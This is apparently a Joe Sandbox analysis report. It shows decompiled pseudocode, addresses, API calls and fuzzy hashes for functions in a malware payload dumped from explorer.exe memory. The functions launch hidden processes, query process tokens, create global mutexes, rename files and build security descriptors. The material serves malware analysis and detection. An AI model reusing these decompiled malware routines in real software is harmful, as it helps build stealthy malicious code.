								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x286f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}



















































                            0x00089b4c
                            0x00089b4e
                            0x00089b51
                            0x00089b53
                            0x00089b5b
                            0x00089b5e
                            0x00089b65
                            0x00089b6d
                            0x00089b6f
                            0x00089b75
                            0x00089b7e
                            0x00089b86
                            0x00089b8c
                            0x00089b93
                            0x00089b99
                            0x00089b9b
                            0x00089b9e
                            0x00089ba0
                            0x00089ba0
                            0x00089ba0
                            0x00089ba8
                            0x00089bab
                            0x00089bb0
                            0x00089bb3
                            0x00089bb6
                            0x00089bb8
                            0x00089cee
                            0x00089cee
                            0x00089cf4
                            0x00089cfb
                            0x00089d3c
                            0x00089d40
                            0x00089d41
                            0x00089d47
                            0x00089d4c
                            0x00089d4f
                            0x00089d4f
                            0x00089d51
                            0x00000000
                            0x00089d51
                            0x00089d00
                            0x00089d0a
                            0x00089d13
                            0x00089d18
                            0x00089d1b
                            0x00089d1e
                            0x00000000
                            0x00000000
                            0x00089d20
                            0x00089d24
                            0x00089d25
                            0x00089d2a
                            0x00089d2b
                            0x00089d2e
                            0x00089d32
                            0x00089d37
                            0x00000000
                            0x00089bbe
                            0x00089bbe
                            0x00089bcb
                            0x00089bd1
                            0x00089bd4
                            0x00089bd6
                            0x00089ceb
                            0x00000000
                            0x00089ceb
                            0x00089bdf
                            0x00089be3
                            0x00089beb
                            0x00089bf2
                            0x00089bf5
                            0x00089bf8
                            0x00089d54
                            0x00089d57
                            0x00089d6f
                            0x00089d72
                            0x00089d74
                            0x00089dc8
                            0x00089dcb
                            0x00089dcd
                            0x00089dcf
                            0x00089dcf
                            0x00089dd5
                            0x00089dd8
                            0x00089dd8
                            0x00089ddd
                            0x00089de4
                            0x00089dea
                            0x00089def
                            0x00089df2
                            0x00089df4
                            0x00089e0b
                            0x00089e11
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00089df6
                            0x00089df6
                            0x00089e02
                            0x00089e06
                            0x00089e07
                            0x00089e07
                            0x00000000
                            0x00089df6
                            0x00089d79
                            0x00089d86
                            0x00089d89
                            0x00089d8b
                            0x00089dba
                            0x00089dbd
                            0x00089dbf
                            0x00089dc1
                            0x00089dc1
                            0x00089dc3
                            0x00000000
                            0x00089dc3
                            0x00089d8d
                            0x00089d96
                            0x00089da2
                            0x00089dad
                            0x00000000
                            0x00089db2
                            0x00089bfe
                            0x00089bff
                            0x00089c02
                            0x00089c07
                            0x00089c0b
                            0x00089c10
                            0x00089c13
                            0x00089c16
                            0x00089c18
                            0x00000000
                            0x00000000
                            0x00089c29
                            0x00089c31
                            0x00089c34
                            0x00089c36
                            0x00089cab
                            0x00089cb3
                            0x00089c38
                            0x00089c3a
                            0x00089c49
                            0x00089c51
                            0x00089c57
                            0x00089c5a
                            0x00089c62
                            0x00089c65
                            0x00089c6f
                            0x00089c72
                            0x00089c77
                            0x00089c7a
                            0x00089c7c
                            0x00089c7e
                            0x00089c81
                            0x00089c83
                            0x00089c85
                            0x00089c85
                            0x00089c83
                            0x00089c91
                            0x00089c9c
                            0x00089ca1
                            0x00089ca4
                            0x00089ca4
                            0x00089cc3
                            0x00089cc8
                            0x00089cce
                            0x00089cd1
                            0x00089cd3
                            0x00089cd9
                            0x00089ce2
                            0x00000000
                            0x00089ce8
                            0x00089bb8
                            0x00089b77
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                            • Opcode Fuzzy Hash: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A911, Relevance: 4.6, APIs: 3, Instructions: 74processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 612 8a911-8a941 memset 613 8a94c-8a971 CreateProcessW 612->613 614 8a943-8a948 612->614 615 8a9ae 613->615 616 8a973-8a976 613->616 614->613 619 8a9b0-8a9b6 615->619 617 8a978-8a988 616->617 618 8a996-8a9ac 616->618 617->618 622 8a98a-8a990 GetExitCodeProcess 617->622 618->619 622->618
                            C-Code - Quality: 66%
                            			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0x286f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0x9e684; // 0x286f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}











                            0x0008a91c
                            0x0008a925
                            0x0008a92c
                            0x0008a934
                            0x0008a938
                            0x0008a939
                            0x0008a93a
                            0x0008a93b
                            0x0008a93c
                            0x0008a941
                            0x0008a945
                            0x0008a948
                            0x0008a948
                            0x0008a955
                            0x0008a971
                            0x0008a9ae
                            0x0008a973
                            0x0008a976
                            0x0008a978
                            0x0008a97b
                            0x0008a980
                            0x0008a988
                            0x0008a990
                            0x0008a990
                            0x0008a988
                            0x0008a996
                            0x0008a99e
                            0x0008a9a1
                            0x0008a9a9
                            0x0008a9a9
                            0x0008a9b6

                            APIs
                            • memset.MSVCRT ref: 0008A925
                            • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CodeCreateExitmemset
                            • String ID:
                            • API String ID: 4170947310-0
                            • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                            • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                            0x0008b99b
                            0x0008b99c
                            0x0008b9a3
                            0x0008b9ab
                            0x0008b9af
                            0x0008b9b8
                            0x0008b9fe
                            0x0008b9fe
                            0x0008b9c5
                            0x0008b9cd
                            0x0008b9cf
                            0x0008b9d5
                            0x0008b9ee
                            0x00000000
                            0x0008b9f0
                            0x0008b9f5
                            0x00000000
                            0x0008b9fb
                            0x0008b9d7
                            0x0008b9d7
                            0x0008b9d7
                            0x0008b9d7
                            0x0008b9d5
                            0x0008ba04

                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                            • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocateErrorHeapLast
                            • String ID:
                            • API String ID: 2499131667-0
                            • Opcode ID: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                            • Opcode Fuzzy Hash: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x286f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








                            0x00085910
                            0x00085915
                            0x00085921
                            0x0008592e
                            0x00085932
                            0x0008594a
                            0x0008596a
                            0x0008596b
                            0x0008595a
                            0x0008595a
                            0x00085960
                            0x00085960
                            0x00085934
                            0x00085934
                            0x0008593a
                            0x0008593a
                            0x00085917
                            0x00085917
                            0x00085917
                            0x00085973

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                            • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID:
                            • API String ID: 1925916568-0
                            • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                            • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






                            0x0008a47d
                            0x0008a485
                            0x0008a489
                            0x0008a4a0
                            0x0008a4af
                            0x0008a4b5
                            0x0008a4b8
                            0x0008a4b8
                            0x00000000
                            0x0008a4ba
                            0x0008a48b
                            0x00000000

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                            • GetLastError.KERNEL32 ref: 0008A48B
                            • GetLastError.KERNEL32 ref: 0008A495
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CreateMutex
                            • String ID:
                            • API String ID: 200418032-0
                            • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                            • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0x286fc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0x286f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0x286fc18
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0x286fc18
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























                            0x00086da0
                            0x00086da6
                            0x00086dac
                            0x00086db9
                            0x00086dba
                            0x00086dbb
                            0x00086dc2
                            0x00086dc8
                            0x00086dcd
                            0x00086dcf
                            0x00086dd1
                            0x00086ddd
                            0x00086de2
                            0x00086de2
                            0x00086de7
                            0x00086de9
                            0x00086dea
                            0x00086df4
                            0x00086dfa
                            0x00086dff
                            0x00086e01
                            0x00086e04
                            0x00086e0a
                            0x00086e10
                            0x00086e10
                            0x00086e26
                            0x00086e2a
                            0x00000000
                            0x00000000
                            0x00086e39
                            0x00086e42
                            0x00086e42
                            0x00086e46
                            0x00086e4b
                            0x00086e52
                            0x00086e57
                            0x00086e5d
                            0x00086e62
                            0x00086e6a
                            0x00086e72
                            0x00086ec0
                            0x00086ec7
                            0x00086ec9
                            0x00086ecd
                            0x00000000
                            0x00086ecd
                            0x00086e74
                            0x00086e74
                            0x00086e7c
                            0x00086e7d
                            0x00086e82
                            0x00086e84
                            0x00086e96
                            0x00086ea7
                            0x00086eac
                            0x00086eb5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00086e84
                            0x00086e72
                            0x00000000
                            0x00086e57
                            0x00086ede
                            0x00086ee4
                            0x00086e0a
                            0x00086eeb

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileMove
                            • String ID: %s.%u
                            • API String ID: 3562171763-1288070821
                            • Opcode ID: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                            • Opcode Fuzzy Hash: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0x286fe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0x286fe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















                            0x00082af0
                            0x00082afa
                            0x00082afd
                            0x00082b00
                            0x00082b05
                            0x00082b07
                            0x00082b0d
                            0x00082b17
                            0x00082b1d
                            0x00082b1f
                            0x00082b24
                            0x00082b81
                            0x00082b87
                            0x00082b8b
                            0x00082b96
                            0x00000000
                            0x00082b9d
                            0x00082b26
                            0x00082b28
                            0x00082b28
                            0x00082b31
                            0x00082b35
                            0x00082b3d
                            0x00082b43
                            0x00082b43
                            0x00082b44
                            0x00082b49
                            0x00082b4d
                            0x00082b63
                            0x00082b68
                            0x00082b6e
                            0x00082b71
                            0x00082b74
                            0x00082b74
                            0x00082b76
                            0x00082b77
                            0x00082b7a
                            0x00082b7d
                            0x00000000
                            0x00082b28
                            0x00000000

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcat
                            • String ID: %u;%u;%u
                            • API String ID: 3011335133-2973439046
                            • Opcode ID: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                            • Opcode Fuzzy Hash: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0x286fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0x286fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0x286fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0x286fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0x286fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0x286fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0x286fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0x286fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0x286fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































                            0x0008bd1b
                            0x0008bd1e
                            0x0008bd26
                            0x0008bd2c
                            0x0008bd2f
                            0x0008bd34
                            0x0008bd3a
                            0x0008bd3b
                            0x0008bd3c
                            0x0008bd3d
                            0x0008bd3e
                            0x0008bd3f
                            0x0008bd40
                            0x0008bd41
                            0x0008bd44
                            0x0008bd47
                            0x0008bd49
                            0x0008bd4c
                            0x0008bd50
                            0x0008bd53
                            0x0008bd54
                            0x0008bd59
                            0x0008bd60
                            0x0008be54
                            0x0008be58
                            0x0008be5a
                            0x0008be62
                            0x0008be62
                            0x0008be69
                            0x0008be6b
                            0x0008be73
                            0x0008be73
                            0x0008be78
                            0x0008be7a
                            0x0008be80
                            0x0008be80
                            0x0008be87
                            0x0008be89
                            0x0008be91
                            0x0008be91
                            0x0008be95
                            0x0008be9a
                            0x0008be9a
                            0x0008bd6b
                            0x0008bd6e
                            0x0008bd75
                            0x0008bd76
                            0x0008bd7d
                            0x0008bd80
                            0x0008bd87
                            0x0008bd8a
                            0x0008bd95
                            0x0008bda0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008bda2
                            0x0008bda2
                            0x0008bda5
                            0x0008bda6
                            0x0008bda7
                            0x0008bda8
                            0x0008bda9
                            0x0008bdaa
                            0x0008bdab
                            0x0008bdac
                            0x0008bdae
                            0x0008bdaf
                            0x0008bdb3
                            0x0008bdb4
                            0x0008bdbe
                            0x00000000
                            0x0008bdc4
                            0x0008bdc4
                            0x0008bdc9
                            0x0008bdcb
                            0x0008bdcd
                            0x0008bdce
                            0x0008bdd5
                            0x0008bdd8
                            0x0008bddf
                            0x0008bde2
                            0x0008bde5
                            0x0008bde5
                            0x0008bde8
                            0x0008bdeb
                            0x0008bdec
                            0x0008bdf0
                            0x0008bdf1
                            0x0008bdf6
                            0x0008bdfc
                            0x00000000
                            0x00000000
                            0x0008be08
                            0x0008be0c
                            0x00000000
                            0x00000000
                            0x0008be0e
                            0x0008be14
                            0x0008be16
                            0x0008be1f
                            0x00000000
                            0x00000000
                            0x0008be21
                            0x0008be26
                            0x0008be27
                            0x0008be2a
                            0x0008be2c
                            0x0008be35
                            0x00000000
                            0x00000000
                            0x0008be3a
                            0x0008be3c
